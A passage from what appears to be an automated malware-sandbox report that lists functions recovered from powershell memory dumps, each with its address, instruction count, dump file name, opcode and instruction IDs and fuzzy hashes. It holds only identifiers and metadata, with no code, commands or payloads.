                                                                                                                                                                                                                                                • Opcode ID: 45d21a916e0f7726495be287ec1cd8e48a82faa4af2f261aa0e78ffdd429109d
                                                                                                                                                                                                                                                • Instruction ID: 5786caf93022cb2d7511f9078520451e85339dd0098c784935467f271a89130b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45d21a916e0f7726495be287ec1cd8e48a82faa4af2f261aa0e78ffdd429109d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F0F976600600AF9720CF0AD985C67FBBDEBD4774719C55AE84A4B612C671FC41DEA0
                                                                                                                                                                                                                                                Function 046B90D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9c15eac6c9b3d9276d11f318b6692a4db3ba42994335218228c70a87b60c4b1
                                                                                                                                                                                                                                                • Instruction ID: c8dac4c35773774eedc21961704e2b83ffa7f90b30ac5bca83e848183ccbdc10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9c15eac6c9b3d9276d11f318b6692a4db3ba42994335218228c70a87b60c4b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0C2356042404FE301AB68C4187EA7FA2DFC1319F24806ED9459B296CE392846DBA0
                                                                                                                                                                                                                                                Function 0453D998 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473030336.000000000453D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0453D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_453d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 06e596f632d32c85ff314326a3e8b4f340fa607c7507f726371e538f146bf1c9
                                                                                                                                                                                                                                                • Instruction ID: 053caeadce350082f696828e7bc14b541f34de4d207107302bb7d5be220a474f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06e596f632d32c85ff314326a3e8b4f340fa607c7507f726371e538f146bf1c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF0F976500640AFD725CF06CD85D63BBB9EB85624B1A849DE85A5B312C631FC42CF60
                                                                                                                                                                                                                                                Function 046B7968 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 90f237116c79411df256a7ae39eed0f45a1eac86278ec51c0d85403ee42487b7
                                                                                                                                                                                                                                                • Instruction ID: ce32cf7caff5abbd4de74608096e90df3ecfb3180089e284a70b452b35e55c42
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90f237116c79411df256a7ae39eed0f45a1eac86278ec51c0d85403ee42487b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFF082717006149FD7149B59DC84AAFB7E9FBC8676B00052DE14AC7340DE71BD4587A4
                                                                                                                                                                                                                                                Function 046BDE38 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bd9cbcbe85a655d2e9f098fc0571872c2605b8cf758f6f1fe4d910fd52f6ae00
                                                                                                                                                                                                                                                • Instruction ID: 5a31000578af84e34b8586c6a475bf2dbad1ce114dde532406234024243fd149
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd9cbcbe85a655d2e9f098fc0571872c2605b8cf758f6f1fe4d910fd52f6ae00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2F0FE353141408FC3118F19D954CA6BBF69FDA61631910AEE585DB732DA61DC42CB90
                                                                                                                                                                                                                                                Function 046BAF98 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4bdfdbb8243bda2ce2eab2ffbb4386d53393e7c483b29c84ebb157a73f405b3e
                                                                                                                                                                                                                                                • Instruction ID: da93b613eea4e61783f40c6b9e2c4e578a89fcb7634ca911bb19ca97cd405bff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bdfdbb8243bda2ce2eab2ffbb4386d53393e7c483b29c84ebb157a73f405b3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE0C222B18566179B1EB2BE68205BE66CB8BC5561359C07EE509DB380EC069C0743E9
                                                                                                                                                                                                                                                Function 046B7697 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2555c2f81fd1b7fac309f439a2f08d1cd59534982987e371152fcc5f98654d15
                                                                                                                                                                                                                                                • Instruction ID: 10dd95ae8e93212c9cf1e7690d4d585fe240daaefd4c190cd6fc82efb55bbbf8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2555c2f81fd1b7fac309f439a2f08d1cd59534982987e371152fcc5f98654d15
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F030397001188FDB10EB6DA840AEA77A2EBD8656715419AE909CB315EF34EC068BD1
                                                                                                                                                                                                                                                Function 046B90E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0a939c8954a5c03efa586ba8cfff35efc040f82082834dc5495558983002e5d5
                                                                                                                                                                                                                                                • Instruction ID: 272b93370b2a4502f9a312220003f5a2b80a80a2850c8322bbaddfb534abcf02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a939c8954a5c03efa586ba8cfff35efc040f82082834dc5495558983002e5d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCF0A7756042044BE714AB69D0187DB7BA6EFC4719F20812EDA1957385DF393845DBF0
                                                                                                                                                                                                                                                Function 046B9158 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 28dccedef3716676fd64c4cb3ff56acbcdd9796ba48b8d304e0e169b9994cda7
                                                                                                                                                                                                                                                • Instruction ID: 61d90be7de262fa47f2fd67570796605785bf847bb151398278043193ee1fb37
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28dccedef3716676fd64c4cb3ff56acbcdd9796ba48b8d304e0e169b9994cda7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF05E7060A3404FD7628B78D8AC7DA7FB1EF46310F0444AAE59AD7292CB392885CB50
                                                                                                                                                                                                                                                Function 046BDC88 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d9c2c5337ab1949fee1f6401c956718665a2945ed0b5e6c739970e753b32d376
                                                                                                                                                                                                                                                • Instruction ID: 3640d10e9228ddb82b7bbce97fc3986be835ea48f2505fe36ca137908ff1918d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9c2c5337ab1949fee1f6401c956718665a2945ed0b5e6c739970e753b32d376
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8F0E53120A7906BC313932DA810CDE7FAA9EC217130840AEE086CF2A2DA51D80587E6
                                                                                                                                                                                                                                                Function 046BE7A8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a46dc937b31b8e59d5197d89b93c51dde55dc16dd7538ad7759d13e0f16eb97c
                                                                                                                                                                                                                                                • Instruction ID: 9b46580984c72873f474c6d62bc8120144ea1870cd96ea0898e31f2c287e08ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a46dc937b31b8e59d5197d89b93c51dde55dc16dd7538ad7759d13e0f16eb97c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E0C031F103946BCF120A6CDC85CCA7F26CFDA230F0404BEE542B7222E6635419C391
                                                                                                                                                                                                                                                Function 046BDE48 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 22c23690807e6e5d90abf972c78b988e74f54ad6127dbeb9218cfaa56161a241
                                                                                                                                                                                                                                                • Instruction ID: 8e9f901de7560fe1345a2b73f3243d1c7992dc237c5b9c83fb681f64cd6e0c26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22c23690807e6e5d90abf972c78b988e74f54ad6127dbeb9218cfaa56161a241
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7E0E5353006108F83109B1ED898CA6B7FAEFDEA6531900A9E589DB731DA61EC02CB90
                                                                                                                                                                                                                                                Function 046BDCD9 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ac4faebe9f27a1d4dd574068f3e402cc43cac55d750ba82eb3b8788bee1bc9e1
                                                                                                                                                                                                                                                • Instruction ID: 6a4e08cb0c14f53530d91ecd89d817482f14abee2d5b1eee2d0d69fcda42c068
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac4faebe9f27a1d4dd574068f3e402cc43cac55d750ba82eb3b8788bee1bc9e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAE09231715090A7CB19C66DD8448FABF76DFC9320F0480BFE88BAB254DA326956D7E1
                                                                                                                                                                                                                                                Function 046BE92E Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f60c724fb0e2a63ecab5a87ccd403b5e5971a6b5d76c451e16b02e12dbdffd8
                                                                                                                                                                                                                                                • Instruction ID: 061a91a6a3285dce24d91bdf554a3a21b9e7bc9cb2b05e7986188cc834f4b6c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f60c724fb0e2a63ecab5a87ccd403b5e5971a6b5d76c451e16b02e12dbdffd8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16F06D39A12214DFCB00CB98E685D9DFBB2FF48325B158555E90AA7352CB31AD42DB40
                                                                                                                                                                                                                                                Function 046B9542 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8c73dbc04d24f0b71344d75008477d40df24714ee0d7f74d151fcc0c763fa621
                                                                                                                                                                                                                                                • Instruction ID: e08f609fd963991d922e7601f4a68c3b732f77311e24390f92af4971a498612e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c73dbc04d24f0b71344d75008477d40df24714ee0d7f74d151fcc0c763fa621
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E026123562910BCB5766FC0A105F62E8A4FC215930900AFC584CB293FC04DD4983F2
                                                                                                                                                                                                                                                Function 046B896A Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9aa088b63aa69e86de5babc4d4d89263e3220a76a27b2d49e26a996be0318f6
                                                                                                                                                                                                                                                • Instruction ID: 55e0c6e1f8ad66c0b706146820054060a3180a6d20aefe929d5cd07fc74fdce4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9aa088b63aa69e86de5babc4d4d89263e3220a76a27b2d49e26a996be0318f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13F0653530A3514BD70A2778951C6DD3F62DFC5625F0940AFD515C7243CF38594583D5
                                                                                                                                                                                                                                                Function 046BAF88 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c29d84baddfc20e95b05f3ddbd5a6b79397d4b9cac6c0e9c34ccf0def5804ca4
                                                                                                                                                                                                                                                • Instruction ID: c47049f2f9a647e339f8607fc0d48792f8f5643a078c0513f39272e2ba8bdc47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c29d84baddfc20e95b05f3ddbd5a6b79397d4b9cac6c0e9c34ccf0def5804ca4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FE0862570D2D01B9B17917D64604EA6FE78AC722431D81FEE4C5CB253D8428C068391
                                                                                                                                                                                                                                                Function 046B9168 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: db6b1f12809bfb1e37664066e2c383b8eb1fd062fedbe52526046b03bc652853
                                                                                                                                                                                                                                                • Instruction ID: 8c6f62d9595a7c3a8c8c36c5cb78ddd890ab53cf275381ee3ab4047b0cbdc996
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db6b1f12809bfb1e37664066e2c383b8eb1fd062fedbe52526046b03bc652853
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F0E570A023049BD7649FB9D89C7DABBE9FB44320F00446DE65ED7380DB3978858B90
                                                                                                                                                                                                                                                Function 046BF860 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9d04854df031cfe0bd1bd4dda4513ac5efedbf6bc81545e4593ba61f957466d7
                                                                                                                                                                                                                                                • Instruction ID: 93a2714c900e64936256a63473ee1d8274ecebf95e8e2714890741253397536b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d04854df031cfe0bd1bd4dda4513ac5efedbf6bc81545e4593ba61f957466d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E0ED75E042499FC740DFBDD88269DFFF0AB49210B1085AEC958DB202F7315596CBE2
                                                                                                                                                                                                                                                Function 046B8978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0300afe73bf747b8aced1fae8744fdf46b71bf5c49a27390b2d0d0a73b11e116
                                                                                                                                                                                                                                                • Instruction ID: ba7dab5316684966fddaa65adfc5882ffd3611072364b3b10f87d59e2d4d1003
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0300afe73bf747b8aced1fae8744fdf46b71bf5c49a27390b2d0d0a73b11e116
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BE0DF3630621447CB083B79A40C7EE7B56EFC4725F04402ED61683341DF38284283E9
                                                                                                                                                                                                                                                Function 046B9550 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6ace955d4c002c2b66c3a5d57eb398bdfe9e25a756ee514a73a2117db4d3a9ad
                                                                                                                                                                                                                                                • Instruction ID: cc129e90407b289c07a7c62d3abb952935e7752a23313a329de121f11eaa2103
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ace955d4c002c2b66c3a5d57eb398bdfe9e25a756ee514a73a2117db4d3a9ad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4D09713351026031B5830FE08002FBA0CE8FC02A9304403ECB88C3382FC00EC4103F4
                                                                                                                                                                                                                                                Function 046BDCE8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                • Instruction ID: d194a18ef0fd3a67864df92ec8407b202efa345dd3a57c2e051681d5373d2cc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E08631B1001497CB089959D8104EDF7AADBCC220F04807FD94AAB340EA32695687E1
                                                                                                                                                                                                                                                Function 046BDC98 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 56104f80da8ade8773a9f0ced358e31b9690f1f525b5f075ee8173552bd31a9e
                                                                                                                                                                                                                                                • Instruction ID: f9e2465959f1983f34eaa70056ae365394fb35fd9cab73c44e4031630da7f21a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56104f80da8ade8773a9f0ced358e31b9690f1f525b5f075ee8173552bd31a9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE08C32700615578216A65EA8108DEB7EADEC45B2300842EE4498B380EE61EC4187D5
                                                                                                                                                                                                                                                Function 046B8739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 471c078f75e76c1b3efd6f04e1e6f328aa5970fd16d55a0d19d0e75fc302ede0
                                                                                                                                                                                                                                                • Instruction ID: 4c8d6b29c5e5e33af0c5c5d45e623067a137c79c3368b63c529848c74ccdca49
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471c078f75e76c1b3efd6f04e1e6f328aa5970fd16d55a0d19d0e75fc302ede0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCE04F31A07149CBCB0AABB4E9599EC7F30EF12301B0001ADE96752061EA7115C6CB80
                                                                                                                                                                                                                                                Function 046B8800 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f5f4c808ec606b246e36ffc70440b797548ef27a87758d4579116c6be1f30b4b
                                                                                                                                                                                                                                                • Instruction ID: e5d0ba65a6573e31cfa53727db7e8ec668128cb86ce33321d8a02bae912eab24
